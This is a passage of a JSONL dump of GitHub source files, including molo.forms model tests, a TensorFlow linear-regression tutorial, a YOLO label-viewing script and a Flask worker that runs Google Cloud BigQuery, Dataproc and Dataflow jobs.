self.choice_field.save()\n\n self.assertEqual(','.join(new_choices), self.choice_field.choices)\n\n def test_normal_field_is_not_skippable(self):\n self.assertFalse(self.normal_field.has_skipping)\n\n def test_positive_number_field_is_not_skippable(self):\n self.assertFalse(self.positive_number_field.has_skipping)\n\n def test_only_next_doesnt_skip(self):\n self.assertFalse(self.choice_field.has_skipping)\n\n def test_other_logic_does_skip(self):\n self.choice_field.skip_logic = skip_logic_data(['choice'], ['end'])\n self.choice_field.save()\n self.assertTrue(self.choice_field.has_skipping)\n\n\nclass TestSkipLogicBlock(TestCase, MoloTestCaseMixin):\n def setUp(self):\n self.mk_main()\n self.form = MoloFormPage(\n title='Test Form',\n slug='test-form',\n )\n self.section_index.add_child(instance=self.form)\n self.form.save_revision().publish()\n\n def test_form_raises_error_if_no_object(self):\n block = SkipLogicBlock()\n data = skip_logic_block_data(\n 'next form',\n SkipState.FORM,\n form=None,\n )\n with self.assertRaises(ValidationError):\n block.clean(data)\n\n def test_form_passes_with_object(self):\n block = SkipLogicBlock()\n data = skip_logic_block_data(\n 'next form',\n SkipState.FORM,\n form=self.form.id,\n )\n cleaned_data = block.clean(data)\n self.assertEqual(cleaned_data['skip_logic'], SkipState.FORM)\n self.assertEqual(cleaned_data['form'], self.form)\n\n def test_question_raises_error_if_no_object(self):\n block = SkipLogicBlock()\n data = skip_logic_block_data(\n 'a question',\n SkipState.QUESTION,\n question=None,\n )\n with self.assertRaises(ValidationError):\n block.clean(data)\n\n def test_question_passes_with_object(self):\n block = SkipLogicBlock()\n data = skip_logic_block_data(\n 'a question',\n SkipState.QUESTION,\n question=1,\n )\n cleaned_data = block.clean(data)\n self.assertEqual(cleaned_data['skip_logic'], SkipState.QUESTION)\n self.assertEqual(cleaned_data['question'], 1)\n\n\nclass TestPageBreakWithTwoQuestionsInOneStep(TestCase, MoloTestCaseMixin):\n def setUp(self):\n self.mk_main()\n self.main = Main.objects.all().first()\n self.language_setting = Languages.objects.create(\n site_id=self.main.get_site().pk)\n self.english = SiteLanguageRelation.objects.create(\n language_setting=self.language_setting,\n locale='en',\n is_active=True)\n self.login()\n\n def test_setup(self):\n self.assertEqual(1, FormsIndexPage.objects.count())\n\n create_form()\n\n self.assertEqual(1, MoloFormPage.objects.count())\n\n def test_setup2(self):\n create_form([{\n \"question\":\n \"Why do you feel that way about speaking your opinion?\",\n \"type\": 'multiline',\n \"required\": False,\n \"page_break\": True,\n }, ])\n\n self.assertEqual(1, MoloFormPage.objects.count())\n\n def test_two_questions_in_one_step_when_one_required(self):\n create_form([\n {\n \"question\": \"I feel I can be myself around other people\",\n \"type\": 'radio',\n \"choices\": [\"agree\", \"disagree\"],\n \"required\": True,\n \"page_break\": True,\n },\n {\n \"question\": \"I can speak my opinion\",\n \"type\": 'radio',\n \"choices\": [\"yes\", \"no\", \"maybe\"],\n \"required\": True,\n \"page_break\": False,\n },\n {\n \"question\":\n \"Why do you feel that way about speaking your opinion?\",\n \"type\": 'multiline',\n \"required\": False,\n \"page_break\": True,\n },\n {\n \"question\":\n \"I am able to stand up for myself and what I believe in\",\n \"type\": 'radio',\n \"choices\": [\"Strongly disagree\", \"I don't know\"],\n \"required\": True,\n \"page_break\": False,\n },\n ],\n language=self.english)\n\n self.assertEqual(1, MoloFormPage.objects.count())\n\n form = MoloFormPage.objects.last()\n\n self.assertEqual(4, form.form_fields.count())\n\n field_1 = form.form_fields.all()[0]\n\n self.assertEqual(\n field_1.skip_logic.stream_data[0]['value']['choice'],\n \"agree\"\n )\n self.assertEqual(\n field_1.skip_logic.stream_data[0]['value']['skip_logic'],\n \"next\"\n )\n self.assertEqual(field_1.sort_order, 0)\n\n field_2 = form.form_fields.all()[1]\n\n self.assertEqual(\n field_2.skip_logic.stream_data[0]['value']['choice'],\n \"yes\"\n )\n self.assertEqual(\n field_2.skip_logic.stream_data[0]['value']['skip_logic'],\n \"next\"\n )\n self.assertEqual(field_2.sort_order, 1)\n\n field_3 = form.form_fields.all()[2]\n self.assertEqual(field_3.sort_order, 2)\n\n field_4 = form.form_fields.all()[3]\n\n self.assertEqual(\n field_4.skip_logic.stream_data[0]['value']['choice'],\n \"Strongly disagree\"\n )\n self.assertEqual(\n field_4.skip_logic.stream_data[0]['value']['skip_logic'],\n \"next\"\n )\n self.assertEqual(field_4.sort_order, 3)\n\n response = self.client.get(form.url)\n\n self.assertContains(response, field_1.label)\n self.assertContains(response, 'Next Question')\n self.assertContains(response, 'action=\"' + form.url + '?p=2\"')\n\n response = self.client.post(form.url + '?p=2', {\n field_1.clean_name:\n field_1.skip_logic.stream_data[0]['value']['choice'],\n })\n self.assertContains(response, field_2.label)\n self.assertContains(response, field_3.label)\n self.assertContains(response, 'action=\"' + form.url + '?p=3\"')\n\n response = self.client.post(form.url + '?p=3', {\n field_3.clean_name: 'because ;)',\n }, follow=True)\n\n self.assertContains(response, \"This field is required\")\n self.assertContains(response, 'action=\"' + form.url + '?p=3\"')\n\n response = self.client.post(form.url + '?p=3', {\n field_2.clean_name:\n field_2.skip_logic.stream_data[0]['value']['choice'],\n field_3.clean_name: 'because ;)',\n })\n\n self.assertContains(response, field_4.label)\n\n response = self.client.post(form.url + '?p=4', follow=True)\n self.assertContains(response, \"This field is required\")\n\n response = self.client.post(form.url + '?p=4', {\n field_4.clean_name:\n field_4.skip_logic.stream_data[0]['value']['choice'],\n }, follow=True)\n\n self.assertContains(response, form.thank_you_text)\n\n def test_two_questions_in_last_step_when_one_required(self):\n create_form([\n {\n \"question\": \"I feel I can be myself around other people\",\n \"type\": 'radio',\n \"choices\": [\"agree\", \"disagree\"],\n \"required\": True,\n \"page_break\": True,\n },\n {\n \"question\": \"I can speak my opinion\",\n \"type\": 'radio',\n \"choices\": [\"yes\", \"no\", \"maybe\"],\n \"required\": True,\n \"page_break\": False,\n },\n {\n \"question\":\n \"Why do you feel that way about speaking your opinion?\",\n \"type\": 'multiline',\n \"required\": False,\n \"page_break\": False,\n },\n ])\n\n self.assertEqual(1, MoloFormPage.objects.count())\n\n form = MoloFormPage.objects.last()\n\n self.assertEqual(3, form.form_fields.count())\n\n field_1 = form.form_fields.all()[0]\n\n self.assertEqual(\n field_1.skip_logic.stream_data[0]['value']['choice'],\n \"agree\"\n )\n self.assertEqual(\n field_1.skip_logic.stream_data[0]['value']['skip_logic'],\n \"next\"\n )\n self.assertEqual(field_1.sort_order, 0)\n\n field_2 = form.form_fields.all()[1]\n\n self.assertEqual(\n field_2.skip_logic.stream_data[0]['value']['choice'],\n \"yes\"\n )\n self.assertEqual(\n field_2.skip_logic.stream_data[0]['value']['skip_logic'],\n \"next\"\n )\n self.assertEqual(field_2.sort_order, 1)\n\n field_3 = form.form_fields.all()[2]\n self.assertEqual(field_3.sort_order, 2)\n\n response = self.client.get(form.url)\n\n self.assertContains(response, field_1.label)\n self.assertContains(response, 'Next Question')\n\n response = self.client.post(form.url + '?p=2', {\n field_1.clean_name:\n field_1.skip_logic.stream_data[0]['value']['choice'],\n })\n self.assertContains(response, field_2.label)\n self.assertContains(response, field_3.label)\n\n response = self.client.post(form.url + '?p=3', {\n field_3.clean_name: 'because ;)',\n }, follow=True)\n\n self.assertContains(response, \"This field is required\")\n response = self.client.post(form.url + '?p=3', {\n field_2.clean_name:\n field_2.skip_logic.stream_data[0]['value']['choice'],\n field_3.clean_name: 'because ;)',\n }, follow=True)\n self.assertContains(response, form.thank_you_text)\n\n\nclass TestFormFieldDefaultDateValidation(TestCase, MoloTestCaseMixin):\n def setUp(self):\n self.mk_main()\n self.login()\n\n def create_molo_form_field(self, field_type):\n form = MoloFormPage(\n title='Test Form',\n introduction='Introduction to Test Form ...',\n )\n FormsIndexPage.objects.first().add_child(instance=form)\n form.save_revision().publish()\n\n return MoloFormField.objects.create(\n page=form,\n label=\"When is your birthday\",\n field_type=field_type,\n admin_label=\"birthday\",\n )\n\n def create_personalisable_form_field(self, field_type):\n form = PersonalisableForm(\n title='Test Form',\n introduction='Introduction to Test Form ...',\n )\n\n FormsIndexPage.objects.first().add_child(instance=form)\n form.save_revision().publish()\n\n return PersonalisableFormField.objects.create(\n page=form,\n label=\"When is your birthday\",\n field_type=field_type,\n admin_label=\"birthday\",\n )\n\n def test_date_molo_form_fields_clean_if_blank(self):\n field = self.create_molo_form_field('date')\n field.default_value = \"\"\n try:\n field.clean()\n except ValidationError:\n self.fail(\"clean() raised ValidationError with valid content!\")\n\n def test_date_molo_form_fields_clean_with_valid_default(self):\n field = self.create_molo_form_field('date')\n field.default_value = \"2008-05-05\"\n try:\n field.clean()\n except ValidationError:\n self.fail(\"clean() raised ValidationError with valid content!\")\n\n def test_date_molo_form_fields_not_clean_with_invalid_default(self):\n field = self.create_molo_form_field('date')\n field.default_value = \"something that isn't a date\"\n with self.assertRaises(ValidationError) as e:\n field.clean()\n\n self.assertEqual(e.exception.messages, ['Must be a valid date'])\n\n def test_datetime_molo_form_fields_clean_if_blank(self):\n field = self.create_molo_form_field('datetime')\n field.default_value = \"\"\n try:\n field.clean()\n except ValidationError:\n self.fail(\"clean() raised ValidationError with valid content!\")\n\n def test_datetime_molo_form_fields_clean_with_valid_default(self):\n field = self.create_molo_form_field('datetime')\n field.default_value = \"2008-05-05\"\n try:\n field.clean()\n except ValidationError:\n self.fail(\"clean() raised ValidationError with valid content!\")\n\n def test_datetime_molo_form_fields_not_clean_with_invalid_default(self):\n field = self.create_molo_form_field('datetime')\n field.default_value = \"something that isn't a date\"\n with self.assertRaises(ValidationError) as e:\n field.clean()\n\n self.assertEqual(e.exception.messages, ['Must be a valid date'])\n\n def test_date_personalisabe_form_fields_clean_if_blank(self):\n field = self.create_personalisable_form_field('date')\n field.default_value = \"\"\n try:\n field.clean()\n except ValidationError:\n self.fail(\"clean() raised ValidationError with valid content!\")\n\n def test_date_personalisabe_form_fields_clean_with_valid_default(self):\n field = self.create_personalisable_form_field('date')\n field.default_value = \"2008-05-05\"\n try:\n field.clean()\n except ValidationError:\n self.fail(\"clean() raised ValidationError with valid content!\")\n\n def test_date_personalisable_fields_not_clean_with_invalid_default(self):\n field = self.create_personalisable_form_field('date')\n field.default_value = \"something that isn't a date\"\n with self.assertRaises(ValidationError) as e:\n field.clean()\n\n self.assertEqual(e.exception.messages, ['Must be a valid date'])\n\n def test_datetime_personalisabe_form_fields_clean_if_blank(self):\n field = self.create_personalisable_form_field('datetime')\n field.default_value = \"\"\n try:\n field.clean()\n except ValidationError:\n self.fail(\"clean() raised ValidationError with valid content!\")\n\n def test_datetime_personalisabe_form_fields_clean_with_valid_default(self):\n field = self.create_personalisable_form_field('datetime')\n field.default_value = \"2008-05-05\"\n try:\n field.clean()\n except ValidationError:\n self.fail(\"clean() raised ValidationError with valid content!\")\n\n def test_datetime_personalisable_fields_not_clean_with_invalid_default(\n self):\n field = self.create_personalisable_form_field('datetime')\n field.default_value = \"something that isn't a date\"\n with self.assertRaises(ValidationError) as e:\n field.clean()\n\n self.assertEqual(e.exception.messages, ['Must be a valid date'])\n","repo_name":"praekeltfoundation/molo.forms","sub_path":"molo/forms/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":20883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72177005033","text":"for t in range(int(input())):\r\n n = int(input())\r\n size = []\r\n answer = 0\r\n for i in range(n):\r\n size.append(int(input()))\r\n for num in size:\r\n if num < sum(size)//n:\r\n answer += (sum(size)//n - num)\r\n print('#' + str(t+1), str(answer))","repo_name":"khw5123/Algorithm","sub_path":"SWExpert/5603. [Professional] 건초더미.py","file_name":"5603. [Professional] 건초더미.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4175382251","text":"# !usr/bin/env python\n# coding:utf-8\n\n\"\"\"\nHello World Tensorflow\n 真的是方法千万种\nauthor: prucehuang \n email: 1756983926@qq.com\n date: 2019/08/04\n\"\"\"\n\nimport sys, os\nfor i in range(len(sys.path)):\n sys.path[i] = sys.path[i].split('\\. ')[0]\n\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn import datasets\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import StandardScaler\n\ndef reset_graph(seed=42):\n tf.reset_default_graph()\n tf.set_random_seed(seed)\n np.random.seed(seed)\n\n# 方法一:用正规方程方法计算theta\ndef equation_tensorflow():\n X = tf.constant(iris_data_plus_bias, dtype=tf.float32, name=\"X\")\n y = tf.constant(iris.target.reshape(-1, 1), dtype=tf.float32, name=\"y\")\n XT = tf.transpose(X)\n theta = tf.matmul(tf.matmul(tf.matrix_inverse(tf.matmul(XT, X)), XT), y)\n with tf.Session() as sess:\n theta_value = theta.eval()\n print('tensorflow:\\n', theta_value)\n\n# 方法二:使用numpy的函数正规方程发求解theta\ndef equstion_numpy():\n X = iris_data_plus_bias\n y = iris.target.reshape(-1, 1)\n theta_numpy = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(y)\n print('numpy:\\n', theta_numpy)\n\n# 方法三:使用sklearn的LR class求解\ndef linear_regression_sklearn():\n lin_reg = LinearRegression()\n lin_reg.fit(iris.data, iris.target.reshape(-1, 1))\n print('sklearn:\\n', np.r_[lin_reg.intercept_.reshape(-1, 1), lin_reg.coef_.T])\n\n# 方法四:使用TensorFlow手动梯度下降\ndef gradients_descent_manually_tensorflow():\n reset_graph()\n n_epochs = 1000\n learning_rate = 0.01\n\n X = tf.constant(scaled_iris_data_plus_bias, dtype=tf.float32, name=\"X\")\n y = tf.constant(iris.target.reshape(-1, 1), dtype=tf.float32, name=\"y\")\n theta = tf.Variable(tf.random_uniform([n + 1, 1], -1.0, 1.0, seed=42), name=\"theta\")\n y_pred = tf.matmul(X, theta, name=\"predictions\")\n error = y_pred - y\n mse = tf.reduce_mean(tf.square(error), name=\"mse\")\n gradients = 2 / m * tf.matmul(tf.transpose(X), error)\n training_op = tf.assign(theta, theta - learning_rate * gradients)\n\n init = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init)\n for epoch in range(n_epochs):\n if epoch % 100 == 0:\n print(\"Epoch\", epoch, \"MSE =\", mse.eval())\n sess.run(training_op)\n\n best_theta = theta.eval()\n print('tensorflow manually gradients\\n', best_theta)\n\n# 方法五:使用TensorFlow autodiff梯度下降\ndef gradients_descent_autodiff_tensorflow():\n reset_graph()\n n_epochs = 1000\n learning_rate = 0.01\n\n X = tf.constant(scaled_iris_data_plus_bias, dtype=tf.float32, name=\"X\")\n y = tf.constant(iris.target.reshape(-1, 1), dtype=tf.float32, name=\"y\")\n theta = tf.Variable(tf.random_uniform([n + 1, 1], -1.0, 1.0, seed=42), name=\"theta\")\n y_pred = tf.matmul(X, theta, name=\"predictions\")\n error = y_pred - y\n mse = tf.reduce_mean(tf.square(error), name=\"mse\")\n gradients = tf.gradients(mse, [theta])[0]\n training_op = tf.assign(theta, theta - learning_rate * gradients)\n\n init = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init)\n for epoch in range(n_epochs):\n if epoch % 100 == 0:\n print(\"Epoch\", epoch, \"MSE =\", mse.eval())\n sess.run(training_op)\n\n best_theta_1 = theta.eval()\n\n print('tensorflow audodiff gradients:\\n', best_theta_1)\n\n# 方法六:直接使用GradientDescentOptimizer\ndef gradients_descent_optinizer_tensorflow():\n reset_graph()\n n_epochs = 1000\n learning_rate = 0.01\n\n X = tf.constant(scaled_iris_data_plus_bias, dtype=tf.float32, name=\"X\")\n y = tf.constant(iris.target.reshape(-1, 1), dtype=tf.float32, name=\"y\")\n theta = tf.Variable(tf.random_uniform([n + 1, 1], -1.0, 1.0, seed=42), name=\"theta\")\n y_pred = tf.matmul(X, theta, name=\"predictions\")\n error = y_pred - y\n mse = tf.reduce_mean(tf.square(error), name=\"mse\")\n # optimizer\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n training_op = optimizer.minimize(mse)\n # start execution\n init = tf.global_variables_initializer()\n\n with tf.Session() as sess:\n sess.run(init)\n for epoch in range(n_epochs):\n if epoch % 100 == 0:\n print(\"Epoch\", epoch, \"MSE =\", mse.eval())\n sess.run(training_op)\n best_theta = theta.eval()\n\n print(\"tensorflow gradient descent optimizer:\\n\", best_theta)\n\n# 方法七:使用MomentumOptimizer\ndef gradients_descent_MomentumOptimizer_tnesorflow():\n reset_graph()\n n_epochs = 1000\n learning_rate = 0.01\n\n X = tf.constant(scaled_iris_data_plus_bias, dtype=tf.float32, name=\"X\")\n y = tf.constant(iris.target.reshape(-1, 1), dtype=tf.float32, name=\"y\")\n theta = tf.Variable(tf.random_uniform([n + 1, 1], -1.0, 1.0, seed=42), name=\"theta\")\n y_pred = tf.matmul(X, theta, name=\"predictions\")\n error = y_pred - y\n mse = tf.reduce_mean(tf.square(error), name=\"mse\")\n # 使用MomentumOptimizer\n optimizer = tf.train.MomentumOptimizer(learning_rate=learning_rate, momentum=0.9)\n training_op = optimizer.minimize(mse)\n # start execution\n init = tf.global_variables_initializer()\n with tf.Session() as sess:\n sess.run(init)\n for epoch in range(n_epochs):\n sess.run(training_op)\n if epoch % 100 == 0:\n print(\"Epoch\", epoch, \"MSE =\", mse.eval())\n best_theta = theta.eval()\n\n print(\"tensorflow momentum optimizer:\\n\", best_theta)\n\n\ndef fetch_batch(epoch, batch_index, batch_size, n_batches):\n np.random.seed(epoch * n_batches + batch_index)\n indices = np.random.randint(m, size=batch_size)\n X_batch = scaled_iris_data_plus_bias[indices]\n y_batch = iris.target.reshape(-1, 1)[indices]\n return X_batch, y_batch\n\n# 方法八:随机梯度下降,使用placeholder\ndef batch_gradients_descent_optinizer_placeholder_tensorflow():\n reset_graph()\n learning_rate = 0.01\n iris = datasets.load_iris()\n m, n = iris.data.shape\n n_epochs = 10\n batch_size = 100\n n_batches = int(np.ceil(m / batch_size))\n scaler = StandardScaler()\n scaled_iris_data = scaler.fit_transform(iris.data)\n scaled_iris_data_plus_bias = np.c_[np.ones((m, 1)), scaled_iris_data]\n # placeholder是一个占位符,后续将使用feed_dict往里面添加实际内容\n X = tf.placeholder(tf.float32, shape=(None, n + 1), name=\"X\")\n y = tf.placeholder(tf.float32, shape=(None, 1), name=\"y\")\n theta = tf.Variable(tf.random_uniform([n + 1, 1], -1.0, 1.0, seed=42), name=\"theta\")\n y_pred = tf.matmul(X, theta, name=\"predictions\")\n error = y_pred - y\n mse = tf.reduce_mean(tf.square(error), name=\"mse\")\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n training_op = optimizer.minimize(mse)\n\n init = tf.global_variables_initializer()\n\n with tf.Session() as sess:\n sess.run(init)\n for epoch in range(n_epochs):\n for batch_index in range(n_batches):\n X_batch, y_batch = fetch_batch(epoch, batch_index, batch_size, n_batches)\n # 每次只喂一个批次的随机数据\n sess.run(training_op, feed_dict={X: X_batch, y: y_batch})\n best_theta_2 = theta.eval()\n\n print(\"tensorflow mini-batch Gradient Descent Optimizer:\\n\", best_theta_2)\n\nif __name__ == \"__main__\":\n print('Hello, Welcome to My World')\n reset_graph()\n\n iris = datasets.load_iris()\n m, n = iris.data.shape\n iris_data_plus_bias = np.c_[np.ones((m, 1)), iris.data]\n # 特征压缩\n scaler = StandardScaler()\n scaled_iris_data = scaler.fit_transform(iris.data)\n scaled_iris_data_plus_bias = np.c_[np.ones((m, 1)), scaled_iris_data]\n\n # equation_tensorflow()\n # equstion_numpy()\n # linear_regression_sklearn()\n # gradients_descent_manually_tensorflow()\n # gradients_descent_autodiff_tensorflow()\n # gradients_descent_optinizer_tensorflow()\n # gradients_descent_MomentumOptimizer_tnesorflow()\n batch_gradients_descent_optinizer_placeholder_tensorflow()","repo_name":"prucehuang/quickly-start-python","sub_path":"tensorflow/1.x/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":8173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38394743125","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 24 22:59:10 2020\r\n\r\nControl the images in a shout folder and their ground-truth YOLO box\r\n\r\n@author: Onur Caki\r\n\"\"\"\r\n#!python3\r\n\r\nimport os\r\nimport cv2\r\nimport argparse\r\nimport re\r\nimport numpy as np\r\nimage_ext = ['.bmp', '.png', '.jpg']\r\n\r\n\r\ndef color_generator():\r\n label_colors = []\r\n for i in range(80):\r\n c = (int(np.random.randint(60, 255, 3)[0]),\r\n int(np.random.randint(60, 255, 3)[1]),\r\n int(np.random.randint(60, 255, 3)[2]))\r\n label_colors.append(c)\r\n return label_colors\r\n\r\n\r\ndef parse_args():\r\n ap = argparse.ArgumentParser()\r\n ap.add_argument(\"data_path\",\r\n help=\"path of the folder in which shots are located\")\r\n args = ap.parse_args()\r\n return args\r\n\r\n\r\ndef natural_sort(l):\r\n def convert(text): return int(text) if text.isdigit() else text.lower()\r\n def alphanum_key(key): return [convert(c)\r\n for c in re.split('([0-9]+)', key)]\r\n return sorted(l, key=alphanum_key)\r\n\r\n\r\ndef get_image_list(path):\r\n image_names = []\r\n for maindir, subdir, file_name_list in os.walk(path):\r\n for filename in file_name_list:\r\n apath = os.path.join(maindir, filename)\r\n ext = os.path.splitext(apath)[1]\r\n if ext in image_ext:\r\n image_names.append(apath)\r\n return natural_sort(image_names)\r\n\r\n\r\ndef read_gt(label, experiment_image):\r\n with open(label) as f:\r\n labels = []\r\n Lines = f.readlines()\r\n for line in Lines:\r\n label = int(line.strip().split(' ')[0])\r\n # x_width\r\n xc = float(line.strip().split(' ')[1])\r\n # x_height\r\n yc = float(line.strip().split(' ')[2])\r\n w = float(line.strip().split(' ')[3])\r\n h = float(line.strip().split(' ')[4])\r\n # x_min = max(xc-w/2, 0)\r\n # y_min = max(yc-h/2, 0)\r\n # x_max = min(xc+w/2, 1)\r\n # y_max = min(yc+h/2, 1)\r\n\r\n xc_Real = xc * experiment_image.shape[1]\r\n yc_Real = yc * experiment_image.shape[0]\r\n w_Real = w * experiment_image.shape[1]\r\n h_Real = h * experiment_image.shape[0]\r\n\r\n # x_min = int(round(x_min * experiment_image.shape[1]))\r\n # x_max = int(round(x_max * experiment_image.shape[1]))\r\n\r\n # y_min = int(round(y_min * experiment_image.shape[0]))\r\n # y_max = int(round(y_max * experiment_image.shape[0]))\r\n\r\n # x_min = int(xc_Real-w_Real/2)\r\n # x_max = int(xc_Real+w_Real/2)\r\n # y_min = int(yc_Real-h_Real/2)\r\n # y_max = int(yc_Real+h_Real/2)\r\n\r\n x_min = int(round(xc_Real-w_Real/2))\r\n x_max = int(round(xc_Real+w_Real/2))\r\n y_min = int(round(yc_Real-h_Real/2))\r\n y_max = int(round(yc_Real+h_Real/2))\r\n\r\n labels.append([label, x_min, y_min, x_max, y_max])\r\n f.close()\r\n return labels\r\n\r\n\r\ndef read_class_names(path):\r\n path = os.path.join(path, 'classes.txt')\r\n classes = []\r\n if os.path.exists(path):\r\n with open(path) as f:\r\n lines = f.readlines()\r\n for line in lines:\r\n classes.append(line.strip())\r\n return classes\r\n\r\n\r\nargs = parse_args()\r\nimage_path = args.data_path\r\n#image_path = \"/Users/hamzagorgulu/Desktop/course_contents/COMP541_Deep_Learning/Project/images_crop\"\r\nimage_list = get_image_list(image_path)\r\nlabel_colors = color_generator()\r\nclasses = read_class_names(image_path)\r\n\r\ni = 0\r\ndelete_list = []\r\nnew_anatotations = []\r\nwhile 1:\r\n image = image_list[i]\r\n img = cv2.imread(image)\r\n\r\n # label_file_pth = image.replace(\"images\", \"labels\")\r\n # label_path = label_file_pth.replace(\"png\", \"txt\")\r\n label_path = image[:image.rfind('.')]+'.txt'\r\n\r\n if not os.path.exists(label_path):\r\n img = cv2.putText(img, 'There is no label for this image', (15, 15),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 1, cv2.LINE_AA)\r\n else:\r\n label = read_gt(label_path, img)\r\n for l in label:\r\n # represents the top left corner of rectangle\r\n start_point = (l[1], l[2])\r\n # represents the bottom right corner of rectangle\r\n end_point = (l[3], l[4])\r\n # green color in BGR\r\n color = label_colors[l[0]]\r\n # Line thickness of -1 px\r\n thickness = 1\r\n radius = 1\r\n xc = int((start_point[0] + end_point[0])/2)\r\n yc = int((start_point[1] + end_point[1])/2)\r\n\r\n center_coordinates = (xc, yc)\r\n img = cv2.circle(img, center_coordinates, radius, color, thickness)\r\n\r\n img = cv2.rectangle(img, start_point, end_point, color, thickness)\r\n if len(classes) > 0:\r\n img = cv2.putText(img, classes[l[0]], (l[1]-5, l[2]-5),\r\n cv2.FONT_HERSHEY_SIMPLEX, 1, color, 1, cv2.LINE_AA)\r\n if img.shape[0] >= 850:\r\n if img.shape[0] > img.shape[1]:\r\n img = cv2.resize(img, (540, 720)) # Resize image\r\n else:\r\n img = cv2.resize(img, (720, 540))\r\n cv2.imshow('window', img)\r\n ch = cv2.waitKey(0)\r\n\r\n if chr(ch) == \"d\":\r\n i = i + 1\r\n if i > len(image_list) - 1:\r\n print(\"finish\")\r\n i = 0\r\n if chr(ch) == \"a\":\r\n i = i - 1\r\n if i < 0:\r\n i = len(image_list) - 1\r\n if chr(ch) == \"1\":\r\n delete_list.append(image)\r\n if chr(ch) == \"2\":\r\n new_anatotations.append(image)\r\n if chr(ch) == \"p\":\r\n print(image)\r\n if chr(ch) == \"r\":\r\n i = np.random.randint(low=0, high=len(image_list), size=1)[0]\r\n if chr(ch) == \"q\":\r\n cv2.destroyAllWindows()\r\n break\r\n\r\nif len(delete_list) != 0:\r\n delete_txt = open('delete.txt', 'w')\r\n for ele in delete_list:\r\n delete_txt.write(ele + '\\n')\r\n delete_txt.close()\r\n\r\n\r\nif len(new_anatotations) != 0:\r\n label_txt = open('label.txt', 'w')\r\n for ele in new_anatotations:\r\n label_txt.write(ele + '\\n')\r\n label_txt.close()\r\n","repo_name":"hamzagorgulu/Small-Object-Detection-with-YOLO","sub_path":"control_yolo_dataset.py","file_name":"control_yolo_dataset.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2297084370","text":"import os\nimport sys\nimport glob\nimport string\nimport pandas as pd\nimport multiprocessing \n\n#os.chdir(\"../src\")\n#extension = 'csv'\n\nif __name__==\"__main__\":\n print(\"hello!\")\n total_mean_name = \"total_mean_vax_levels.csv\"\n total_quantile_name = \"total_quantile_vax_levels.csv\"\n n = 1\n starting_config = 0\n for k in range(starting_config,n):\n string_val = str(k)\n title_name = \"run_*_\"+string_val+\"0.csv\"\n all_filenames = [i for i in glob.glob(title_name)]\n title_name = \"run_*_\"+string_val+\"0.csv\"\n all_filenames = [i for i in glob.glob(title_name)]\n #combine all files in the list\n for j in range(0,len(all_filenames)):\n all_filenames[j] = os.path.basename(all_filenames[j])\n combined_csv = pd.concat([pd.read_csv(f) for f in all_filenames ])\n print(\"combined!!\")\n name = \"total_sim_vax_level_\"+str(k)+\"0.csv\"\n combined_csv.to_csv(name,index=False,encoding='utf-8-sig')\n \n","repo_name":"vakrao/stochastic_endemic_model","sub_path":"scripts/seq_csv.py","file_name":"seq_csv.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13086413525","text":"import utils\nfrom flask import Flask, request \nfrom config import config\nfrom connector.gcp import GCPService\nfrom scheduler import SchedulerJob\n\n\napp = Flask(__name__)\ngcp_service = GCPService() \nscheduler = SchedulerJob()\n\n\n@app.route(\"/export_customers\", methods=['POST'])\ndef export():\n \"\"\"Runs a query against BigQuery and export results to a GCS bucket.\"\"\"\n date = (None if request.form.get('date') == 'None' else\n utils.process_url_date(request.form.get('date')))\n query_job_body = utils.load_query_job_body(date,\n **config)\n job = gcp_service.bigquery.execute_job(config['general']['project_id'],\n query_job_body)\n\n gcp_service.bigquery.poll_job(job)\n\n extract_job_body = utils.load_extract_job_body(date, **config)\n gcp_service.bigquery.execute_job(config['general']['project_id'],\n extract_job_body)\n return \"finished\"\n\n\n@app.route(\"/dataproc_dimsum\", methods=['POST'])\ndef dataproc_dimsum():\n \"\"\"Prepares whole environment to run DIMSUM spark job in Dataproc. After\n the processing is over (this method waits until job is complete) then\n schedules a new call to prepare Datastore with the resulting similarity\n matrix we obtain from the algorithm.\"\"\"\n extended_args = request.form.get('extended_args').split(',')\n setup = config['jobs']['run_dimsum']\n job = gcp_service.dataproc.build_cluster(**setup)\n gcp_service.storage.upload_from_filenames(\n **config['jobs']['run_dimsum']['pyspark_job'])\n job = gcp_service.dataproc.submit_pyspark_job(extended_args,\n **config['jobs']['run_dimsum'])\n result = gcp_service.dataproc.delete_cluster(**setup)\n scheduler.run({'url': '/prepare_datastore',\n 'target': config['jobs']['dataflow_export'][\n 'dataflow_service']})\n return \"finished\"\n\n\n@app.route(\"/prepare_datastore\", methods=['POST'])\ndef prepare_datastore():\n \"\"\"With DIMSUM job completed, we run a Dataflow job to get results from \n GCS and save them properly into Datastore so we have quick access to\n results to build final recommendations for our customers.\"\"\"\n result = gcp_service.dataflow.run_template(**config['jobs'][\n 'dataflow_export']) \n return \"finished\"\n","repo_name":"WillianFuks/example_dataproc_twitter","sub_path":"gae/worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"72"} +{"seq_id":"9554343907","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport fnmatch\nimport argparse\nimport json\nimport csv\nimport os\nimport collections\nfrom toil import subprocess\nimport logging\nimport textwrap\n\nimport toil.wdl.wdl_parser as wdl_parser\n\nwdllogger = 